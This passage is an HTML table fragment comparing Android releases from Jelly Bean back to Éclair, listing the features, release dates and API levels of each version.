<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Dial pad autocomplete<br />
</span>
<span style="font-size: 10pt;">Ability to create restricted profiles for tablets<br />
</span><br />
<span style="font-size: 10pt;">Bluetooth Low Energy (BLE) support<br />
</span><br />
<span style="font-size: 10pt;">Bluetooth Audio/Video Remote Control Profile (AVRCP) 1.3 support<br />
</span><br />
<span style="font-size: 10pt;">Security and performance enhancements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Logging and analyzing enhancements<br />
</span>
<span style="font-size: 10pt;">Wi-Fi scanning API<br />
</span><br />
<span style="font-size: 10pt;">Improved DRM (digital rights management) API<br />
</span><br />
<span style="font-size: 10pt;">VP8 encoding</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Jul 24</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">18</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-2-2" target="_top"><span style="font-size: 10pt;"><strong>Android 4.2.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Allow toggling Wi-Fi and Bluetooth state in Quick Settings using long-press<br />
</span>
<span style="font-size: 10pt;">Shows the percentage and estimated time remaining in the active download notifications<br />
</span><br />
<span style="font-size: 10pt;">Gallery app updated for faster loading with new image transition<br />
</span><br />
<span style="font-size: 10pt;">Performance enhancements and bug fixes (Bluetooth A2DP audio streaming fix)</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Secure USB debugging (allow debugging to authenticated computers only)</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2013 Feb 11</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">17</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-2-1" target="_top"><span style="font-size: 10pt;"><strong>Android 4.2.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fix missing December bug in the People app<br />
</span>
<span style="font-size: 10pt;">Add support for Bluetooth gamepads and joysticks HID devices</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Nov 27</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">17</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-2" target="_top"><span style="font-size: 10pt;"><strong>Android 4.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Lock screen widgets<br />
</span>
<span style="font-size: 10pt;">Wireless display with Miracast<br />
</span><br />
<span style="font-size: 10pt;">Multi-user for tablets</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">vsync timing<br />
</span>
<span style="font-size: 10pt;">Triple buffering<br />
</span><br />
<span style="font-size: 10pt;">reduced touch latency<br />
</span><br />
<span style="font-size: 10pt;">CPU input boost<br />
</span><br />
<span style="font-size: 10pt;">External display support – Display Manager<br />
</span><br />
<span style="font-size: 10pt;">Nested fragments</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Nov 13</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">17</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-1-2" target="_top"><span style="font-size: 10pt;"><strong>Android 4.1.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Enable Home screen rotation<br />
</span>
<span style="font-size: 10pt;">Fix bugs and enhance performances</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Oct 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">16</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-1-1" target="_top"><span style="font-size: 10pt;"><strong>Android 4.1.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Fix a bug on screen orientation</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Jul 23</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">16</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-1" target="_top"><span style="font-size: 10pt;"><strong>Android 4.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Jelly Bean</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Google Now<br />
</span>
<span style="font-size: 10pt;">Accessibility: gesture mode, enable braille external keyboards.</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">App stack navigation to define a parent activity in manifest for deep navigation<br />
</span>
<span style="font-size: 10pt;">NFC supports large payloads over Bluetooth<br />
</span><br />
<span style="font-size: 10pt;">WIFI/WIFI-Direct service discovery<br />
</span><br />
<span style="font-size: 10pt;">Large, detailed, multi-action notifications<br />
</span><br />
<span style="font-size: 10pt;">Input manager allows you to query input devices</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Jul 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">16</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-0-4" target="_top"><span style="font-size: 10pt;"><strong>Android 4.0.4</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ice Cream Sandwich</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">stability improvements<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2012 Mar 28</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">15</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-0-3" target="_top"><span style="font-size: 10pt;"><strong>Android 4.0.3</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ice Cream Sandwich</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">QVGA video resolution API access<br />
</span>
<span style="font-size: 10pt;">Accessibility API refinements for screen readers<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Dec 16</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">15</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4" target="_top"><span style="font-size: 10pt;"><strong>Android 4.0.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ice Cream Sandwich</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Facial recognition (Face Unlock)<br />
</span>
<span style="font-size: 10pt;">UI use Hardware acceleration<br />
</span><br />
<span style="font-size: 10pt;">Better voice recognition (dictating/Voice typing)<br />
</span><br />
<span style="font-size: 10pt;">Android Beam app to exchange data through NFC</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Oct 19</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">14</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-4-0" target="_top"><span style="font-size: 10pt;"><strong>Android 4.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Ice Cream Sandwich</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">New lock screen actions<br />
</span>
<span style="font-size: 10pt;">Control over network data<br />
</span><br />
<span style="font-size: 10pt;">Email app supports EAS v14<br />
</span><br />
<span style="font-size: 10pt;">WI-FI direct<br />
</span><br />
<span style="font-size: 10pt;">Bluetooth Health Device Profile</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Address Space Layout Randomization<br />
</span>
<span style="font-size: 10pt;">VPN client API<br />
</span><br />
<span style="font-size: 10pt;">Remote Device camera enable/disable<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Oct 18</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">14</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-3-2-1" target="_top"><span style="font-size: 10pt;"><strong>Android 3.2.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Honeycomb</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Android Market updates<br />
</span>
<span style="font-size: 10pt;">Wi-Fi improvements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Sep 20</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">13</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-3-2" target="_top"><span style="font-size: 10pt;"><strong>Android 3.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Honeycomb</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Media sync from SD card</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Extended API for managing screens support<br />
</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Jul 15</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">13</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android3-1" target="_top"><span style="font-size: 10pt;"><strong>Android 3.1</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Honeycomb</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Open Accessory API<br />
</span>
<span style="font-size: 10pt;">USB host API<br />
</span><br />
<span style="font-size: 10pt;">MTP notifications<br />
</span><br />
<span style="font-size: 10pt;">RTP API for audio</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 May 10</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">12</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-3-0" target="_top"><span style="font-size: 10pt;"><strong>Android 3.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Honeycomb</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Multi core support<br />
</span>
<span style="font-size: 10pt;">Better tablet support<br />
</span><br />
<span style="font-size: 10pt;">“Private browsing.”<br />
</span><br />
<span style="font-size: 10pt;">HTTP Live streaming</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Device administration<br />
</span>
<span style="font-size: 10pt;">RTP streaming API<br />
</span><br />
<span style="font-size: 10pt;">Forced rendering of layers<br />
</span><br />
<span style="font-size: 10pt;">High-performance WIFI lock</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Feb 22</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">11</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-3-6" target="_top"><span style="font-size: 10pt;"><strong>Android 2.3.6</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Gingerbread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Voice search issue fixed</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Sep 2</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">10</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-3-5" target="_top"><span style="font-size: 10pt;"><strong>Android 2.3.5</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Gingerbread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Improved network performance for the Nexus S 4G<br />
</span>
<span style="font-size: 10pt;">Fixed Bluetooth issues on the Samsung Galaxy S<br />
</span><br />
<span style="font-size: 10pt;">Gmail app improvements</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Jul 25</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">10</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-3-3" target="_top"><span style="font-size: 10pt;"><strong>Android 2.3.3</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Gingerbread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NFC API improvements<br />
</span>
<span style="font-size: 10pt;">added unsecured Bluetooth sockets</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2011 Feb 9</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">10</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-3" target="_top"><span style="font-size: 10pt;"><strong>Android 2.3</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Gingerbread</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Improved copy/paste<br />
</span>
<span style="font-size: 10pt;">Improved power management<br />
</span><br />
<span style="font-size: 10pt;">Social networking features<br />
</span><br />
<span style="font-size: 10pt;">Near Field Communication support<br />
</span><br />
<span style="font-size: 10pt;">Native VoIP/SIP support<br />
</span><br />
<span style="font-size: 10pt;">Video call support</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">performance – concurrent garbage collection, faster event distribution, updated video drivers<br />
</span>
<span style="font-size: 10pt;">NDK – Native Asset Manager, Native Activities + event handling, khronos API<br />
</span><br />
<span style="font-size: 10pt;">strict mode debugging</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2010 Dec 6</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">9</span></td>
</tr>
<tr>
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-2" target="_top"><span style="font-size: 10pt;"><strong>Android 2.2</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Froyo</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Speed improvements<br />
</span>
<span style="font-size: 10pt;">JIT implementation<br />
</span><br />
<span style="font-size: 10pt;">USB Tethering<br />
</span><br />
<span style="font-size: 10pt;">Applications installation to the expandable memory</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;"> NA</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">2010 May 20</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">8</span></td>
</tr>
<tr style="background: #cccccc;">
<td style="border-bottom: solid #666666 0.5pt; border-left: solid #666666 0.5pt; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><a href="http://socialcompare.com/en/review/android-2-0" target="_top"><span style="font-size: 10pt;"><strong>Android 2.0</strong></span></a></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Éclair</span></td>
<td style="border-bottom: solid #666666 0.5pt; border-left: none; border-right: solid #666666 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Microsoft Exchange support<br />
</span>
<span style="font-size: 10pt;">Bluetooth 2.1</span></td>
